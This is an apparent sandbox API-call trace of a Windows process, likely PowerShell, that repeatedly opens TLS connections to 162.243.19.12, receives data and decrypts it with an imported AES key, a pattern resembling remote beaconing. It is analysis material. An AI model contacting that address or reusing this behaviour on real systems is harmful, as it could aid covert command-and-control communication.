	[0130.222] recv (in: s=0x7d0, buf=0x2ad23684c8d, len=272, flags=0 | out: buf=0x2ad23684c8d*) returned 272
	[0130.222] DecryptMessage (in: phContext=0xd7ef71d060, pMessage=0x2ad23c97278, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23c97278, pfQOP=0x0) returned 0x0
	[0130.223] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0130.223] recv (in: s=0x7d0, buf=0x2ad23684c88, len=5, flags=0 | out: buf=0x2ad23684c88*) returned 5
	[0130.223] recv (in: s=0x7d0, buf=0x2ad23caab85, len=8224, flags=0 | out: buf=0x2ad23caab85*) returned 8224
	[0130.223] DecryptMessage (in: phContext=0xd7ef71d010, pMessage=0x2ad23caccb8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23caccb8, pfQOP=0x0) returned 0x0
	[0130.224] recv (in: s=0x7d0, buf=0x2ad23caab80, len=5, flags=0 | out: buf=0x2ad23caab80*) returned 5
	[0130.224] recv (in: s=0x7d0, buf=0x2ad23caab85, len=8224, flags=0 | out: buf=0x2ad23caab85*) returned 8224
	[0130.224] DecryptMessage (in: phContext=0xd7ef71d010, pMessage=0x2ad23cacea8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23cacea8, pfQOP=0x0) returned 0x0
	[0130.229] recv (in: s=0x7d0, buf=0x2ad23caab80, len=5, flags=0 | out: buf=0x2ad23caab80*) returned 5
	[0130.229] recv (in: s=0x7d0, buf=0x2ad23caab85, len=8224, flags=0 | out: buf=0x2ad23caab85*) returned 8224
	[0130.229] DecryptMessage (in: phContext=0xd7ef71d010, pMessage=0x2ad23cad098, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23cad098, pfQOP=0x0) returned 0x0
	[0130.229] recv (in: s=0x7d0, buf=0x2ad23caab80, len=5, flags=0 | out: buf=0x2ad23caab80*) returned 5
	[0130.229] recv (in: s=0x7d0, buf=0x2ad23caab85, len=8224, flags=0 | out: buf=0x2ad23caab85*) returned 8224
	[0130.229] DecryptMessage (in: phContext=0xd7ef71d010, pMessage=0x2ad23cad288, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23cad288, pfQOP=0x0) returned 0x0
	[0130.229] recv (in: s=0x7d0, buf=0x2ad23caab80, len=5, flags=0 | out: buf=0x2ad23caab80*) returned 5
	[0130.229] recv (in: s=0x7d0, buf=0x2ad23caab85, len=5584, flags=0 | out: buf=0x2ad23caab85*) returned 5584
	[0130.229] DecryptMessage (in: phContext=0xd7ef71d010, pMessage=0x2ad23cad478, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23cad478, pfQOP=0x0) returned 0x0
	[0130.229] SetEvent (hEvent=0x6b8) returned 1
	[0130.349] CoTaskMemAlloc (cb=0x104) returned 0x2ad3bb28a90
	[0130.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad3bb28a90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0130.350] CoTaskMemFree (pv=0x2ad3bb28a90) 
	[0130.397] CoTaskMemAlloc (cb=0x104) returned 0x2ad3bb28a90
	[0130.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad3bb28a90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0130.397] CoTaskMemFree (pv=0x2ad3bb28a90) 
	[0130.400] CoTaskMemAlloc (cb=0x104) returned 0x2ad3bb28430
	[0130.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad3bb28430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0130.401] CoTaskMemFree (pv=0x2ad3bb28430) 
	[0130.405] CryptAcquireContextW (in: phProv=0xd7ef71b9f0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd7ef71b9f0*=0x2ad3bb0d210) returned 1
	[0130.406] CryptImportKey (in: hProv=0x2ad3bb0d210, pbData=0x2ad23f08678, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0xd7ef71ca28 | out: phKey=0xd7ef71ca28*=0x2ad3bafc910) returned 1
	[0130.406] CryptContextAddRef (hProv=0x2ad3bb0d210, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0130.409] CryptContextAddRef (hProv=0x2ad3bb0d210, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0130.409] CryptDuplicateKey (in: hKey=0x2ad3bafc910, pdwReserved=0x0, dwFlags=0x0, phKey=0xd7ef71c708 | out: phKey=0xd7ef71c708*=0x2ad3bafd080) returned 1
	[0130.409] CryptContextAddRef (hProv=0x2ad3bb0d210, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0130.409] CryptSetKeyParam (hKey=0x2ad3bafd080, dwParam=0x4, pbData=0x2ad23f09f58*=0x1, dwFlags=0x0) returned 1
	[0130.409] CryptSetKeyParam (hKey=0x2ad3bafd080, dwParam=0x1, pbData=0x2ad23f09f08, dwFlags=0x0) returned 1
	[0130.574] CryptDecrypt (in: hKey=0x2ad3bafd080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2ad23b89e28, pdwDataLen=0xd7ef71c9b8 | out: pbData=0x2ad23b89e28, pdwDataLen=0xd7ef71c9b8) returned 1
	[0130.575] CryptDecrypt (in: hKey=0x2ad3bafd080, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ad23b9c9b8, pdwDataLen=0xd7ef71c9a8 | out: pbData=0x2ad23b9c9b8, pdwDataLen=0xd7ef71c9a8) returned 0
	[0130.810] CoTaskMemAlloc (cb=0x104) returned 0x2ad3bb23e00
	[0130.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad3bb23e00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0130.810] CoTaskMemFree (pv=0x2ad3bb23e00) 
	[0130.811] CoTaskMemAlloc (cb=0x104) returned 0x2ad3bb22d00
	[0130.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad3bb22d00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0130.811] CoTaskMemFree (pv=0x2ad3bb22d00) 
	[0131.039] CoTaskMemAlloc (cb=0x104) returned 0x2ad3bb23580
	[0131.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad3bb23580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.039] CoTaskMemFree (pv=0x2ad3bb23580) 
	[0131.058] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9d0
	[0138.064] CloseHandle (hObject=0x9d0) returned 1
	[0138.868] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c1f0 | out: phkResult=0xd7ef71c1f0*=0x9d0) returned 0x0
	[0138.868] RegOpenKeyExW (in: hKey=0x9d0, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c0d8 | out: phkResult=0xd7ef71c0d8*=0x9d4) returned 0x0
	[0138.868] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d8
	[0138.868] RegNotifyChangeKeyValue (hKey=0x9d4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d8, fAsynchronous=1) returned 0x0
	[0138.869] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c100 | out: phkResult=0xd7ef71c100*=0x9dc) returned 0x0
	[0138.869] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9e0
	[0138.869] RegNotifyChangeKeyValue (hKey=0x9dc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9e0, fAsynchronous=1) returned 0x0
	[0138.869] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c100 | out: phkResult=0xd7ef71c100*=0x9e4) returned 0x0
	[0138.869] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9e8
	[0138.869] RegNotifyChangeKeyValue (hKey=0x9e4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9e8, fAsynchronous=1) returned 0x0
	[0138.869] GetCurrentProcess () returned 0xffffffffffffffff
	[0138.869] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c068 | out: TokenHandle=0xd7ef71c068*=0x9ec) returned 1
	[0138.878] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb18360
	[0138.882] WinHttpSetTimeouts (hInternet=0x2ad3bb18360, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0138.882] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c148 | out: pProxyConfig=0xd7ef71c148) returned 1
	[0138.914] SetEvent (hEvent=0x6b8) returned 1
	[0138.914] select (in: nfds=0, readfds=0x2ad23b29fa0, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b29fa0, writefds=0x0, exceptfds=0x0) returned 1
	[0138.918] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0138.919] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0138.920] shutdown (s=0x7d0, how=2) returned 0
	[0138.921] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0138.922] closesocket (s=0x7d0) returned 0
	[0138.922] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0138.923] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9b0
	[0138.923] WSAConnect (in: s=0x7d0, name=0x2ad23b2b8c0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0139.032] closesocket (s=0x9b0) returned 0
	[0139.033] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b286e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23b2c148, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23b2c148, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0139.033] FreeContextBuffer (in: pvContextBuffer=0x2ad3badf500 | out: pvContextBuffer=0x2ad3badf500) returned 0x0
	[0139.033] send (in: s=0x7d0, buf=0x2ad23b2c218*, len=333, flags=0 | out: buf=0x2ad23b2c218*) returned 333
	[0139.034] recv (in: s=0x7d0, buf=0x2ad23b2c218, len=5, flags=0 | out: buf=0x2ad23b2c218*) returned 5
	[0139.140] recv (in: s=0x7d0, buf=0x2ad23b2c21d, len=49, flags=0 | out: buf=0x2ad23b2c21d*) returned 49
	[0139.140] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b286e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b2c458, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b2c478, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b2c478, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0139.141] recv (in: s=0x7d0, buf=0x2ad23b2c568, len=5, flags=0 | out: buf=0x2ad23b2c568*) returned 5
	[0139.141] recv (in: s=0x7d0, buf=0x2ad23b2c58d, len=1, flags=0 | out: buf=0x2ad23b2c58d*) returned 1
	[0139.142] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b286e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b2c660, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b2c680, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b2c680, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0139.142] recv (in: s=0x7d0, buf=0x2ad23b2c770, len=5, flags=0 | out: buf=0x2ad23b2c770*) returned 5
	[0139.142] recv (in: s=0x7d0, buf=0x2ad23b2c795, len=48, flags=0 | out: buf=0x2ad23b2c795*) returned 48
	[0139.142] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b286e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b2c898, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23b2c8b8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23b2c8b8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0139.143] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3320 | out: pvContextBuffer=0x2ad3bad3320) returned 0x0
	[0139.143] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23b2ca28 | out: pBuffer=0x2ad23b2ca28) returned 0x0
	[0139.144] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23b2ca80 | out: pBuffer=0x2ad23b2ca80) returned 0x0
	[0139.144] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23b2cae8 | out: pBuffer=0x2ad23b2cae8) returned 0x0
	[0139.144] CertDuplicateCertificateContext (pCertContext=0x2ad3bb064d0) returned 0x2ad3bb064d0
	[0139.145] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0139.145] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb064d0
	[0139.145] CertDuplicateCertificateContext (pCertContext=0x2ad3bb064d0) returned 0x2ad3bb064d0
	[0139.145] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb064d0) returned 0x0
	[0139.145] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0139.146] CertFreeCertificateContext (pCertContext=0x2ad3bb064d0) returned 1
	[0139.146] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0139.147] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb064d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0139.147] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb064d0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0139.148] CertDuplicateCertificateChain (pChainContext=0x2ad3bb2a3d0) returned 0x2ad3bb2a3d0
	[0139.150] CertDuplicateCertificateContext (pCertContext=0x2ad3bb064d0) returned 0x2ad3bb064d0
	[0139.151] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0139.152] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0139.152] CertFreeCertificateChain (pChainContext=0x2ad3bb2a3d0) 
	[0139.152] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3bb2a3d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0139.152] SetLastError (dwErrCode=0x0) 
	[0139.152] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3bb2a3d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0139.153] CertFreeCertificateChain (pChainContext=0x2ad3bb2a3d0) 
	[0139.153] CertFreeCertificateContext (pCertContext=0x2ad3bb064d0) returned 1
	[0139.153] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23b2f6f0, MessageSeqNo=0x0 | out: pMessage=0x2ad23b2f6f0) returned 0x0
	[0139.154] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca340
	[0139.155] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca340*=((len=0x3b, buf=0x2ad23b2c988*), (len=0xd5, buf=0x2ad23b2f4f8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca340*=((len=0x3b, buf=0x2ad23b2c988*), (len=0xd5, buf=0x2ad23b2f4f8*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0139.155] CoTaskMemFree (pv=0x2ad3baca340) 
	[0139.155] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0139.155] recv (in: s=0x7d0, buf=0x2ad23b2f8d0, len=5, flags=0 | out: buf=0x2ad23b2f8d0*) returned 5
	[0139.840] recv (in: s=0x7d0, buf=0x2ad23b2f8f5, len=272, flags=0 | out: buf=0x2ad23b2f8f5*) returned 272
	[0139.841] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23b2fb18, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b2fb18, pfQOP=0x0) returned 0x0
	[0139.841] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0139.841] recv (in: s=0x7d0, buf=0x2ad23b2f8f0, len=5, flags=0 | out: buf=0x2ad23b2f8f0*) returned 5
	[0139.841] recv (in: s=0x7d0, buf=0x2ad23b3127d, len=1248, flags=0 | out: buf=0x2ad23b3127d*) returned 1248
	[0139.841] DecryptMessage (in: phContext=0xd7ef71bb40, pMessage=0x2ad23b31870, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b31870, pfQOP=0x0) returned 0x0
	[0139.841] SetEvent (hEvent=0x6b8) returned 1
	[0140.075] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9d0
	[0156.082] CloseHandle (hObject=0x9d0) returned 1
	[0156.327] RtlLookupFunctionEntry (in: ControlPc=0x7ffbf5e83464, ImageBase=0xd7ef718f50, HistoryTable=0x0 | out: ImageBase=0xd7ef718f50, HistoryTable=0x0) returned 0x7ffbf6113690
	[0156.415] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x9d0) returned 0x0
	[0156.416] RegOpenKeyExW (in: hKey=0x9d0, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9cc) returned 0x0
	[0156.416] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d4
	[0156.416] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d4, fAsynchronous=1) returned 0x0
	[0156.416] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9d8) returned 0x0
	[0156.417] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9dc
	[0156.417] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9dc, fAsynchronous=1) returned 0x0
	[0156.417] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9e0) returned 0x0
	[0156.418] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9e4
	[0156.418] RegNotifyChangeKeyValue (hKey=0x9e0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9e4, fAsynchronous=1) returned 0x0
	[0156.418] GetCurrentProcess () returned 0xffffffffffffffff
	[0156.418] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9e8) returned 1
	[0156.418] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb187a0
	[0156.419] WinHttpSetTimeouts (hInternet=0x2ad3bb187a0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0156.419] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0156.433] SetEvent (hEvent=0x6b8) returned 1
	[0156.433] select (in: nfds=0, readfds=0x2ad23b44410, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b44410, writefds=0x0, exceptfds=0x0) returned 1
	[0156.434] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0156.435] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0156.449] shutdown (s=0x7d0, how=2) returned 0
	[0156.465] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0156.465] closesocket (s=0x7d0) returned 0
	[0156.466] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0156.467] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9f0
	[0156.468] WSAConnect (in: s=0x7d0, name=0x2ad23b45ba8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0156.580] closesocket (s=0x9f0) returned 0
	[0156.581] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b42b50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23b46430, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23b46430, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0156.582] FreeContextBuffer (in: pvContextBuffer=0x2ad3bae01f0 | out: pvContextBuffer=0x2ad3bae01f0) returned 0x0
	[0156.582] send (in: s=0x7d0, buf=0x2ad23b46500*, len=333, flags=0 | out: buf=0x2ad23b46500*) returned 333
	[0156.582] recv (in: s=0x7d0, buf=0x2ad23b46500, len=5, flags=0 | out: buf=0x2ad23b46500*) returned 5
	[0156.688] recv (in: s=0x7d0, buf=0x2ad23b46505, len=49, flags=0 | out: buf=0x2ad23b46505*) returned 49
	[0156.689] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b42b50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b46740, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b46760, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b46760, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0156.689] recv (in: s=0x7d0, buf=0x2ad23b46850, len=5, flags=0 | out: buf=0x2ad23b46850*) returned 5
	[0156.689] recv (in: s=0x7d0, buf=0x2ad23b46875, len=1, flags=0 | out: buf=0x2ad23b46875*) returned 1
	[0156.689] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b42b50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b46948, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b46968, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b46968, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0156.690] recv (in: s=0x7d0, buf=0x2ad23b46a58, len=5, flags=0 | out: buf=0x2ad23b46a58*) returned 5
	[0156.690] recv (in: s=0x7d0, buf=0x2ad23b46a7d, len=48, flags=0 | out: buf=0x2ad23b46a7d*) returned 48
	[0156.690] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b42b50, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b46b80, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23b46ba0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23b46ba0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0156.691] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3920 | out: pvContextBuffer=0x2ad3bad3920) returned 0x0
	[0156.691] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23b46ce8 | out: pBuffer=0x2ad23b46ce8) returned 0x0
	[0156.691] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23b46d40 | out: pBuffer=0x2ad23b46d40) returned 0x0
	[0156.692] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23b46da8 | out: pBuffer=0x2ad23b46da8) returned 0x0
	[0156.692] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06350) returned 0x2ad3bb06350
	[0156.693] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0156.693] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb06350
	[0156.693] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06350) returned 0x2ad3bb06350
	[0156.693] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb06350) returned 0x0
	[0156.693] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0156.693] CertFreeCertificateContext (pCertContext=0x2ad3bb06350) returned 1
	[0156.694] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0156.694] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb06350, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0156.695] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb06350, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0156.696] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0156.698] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06350) returned 0x2ad3bb06350
	[0156.698] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0156.699] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
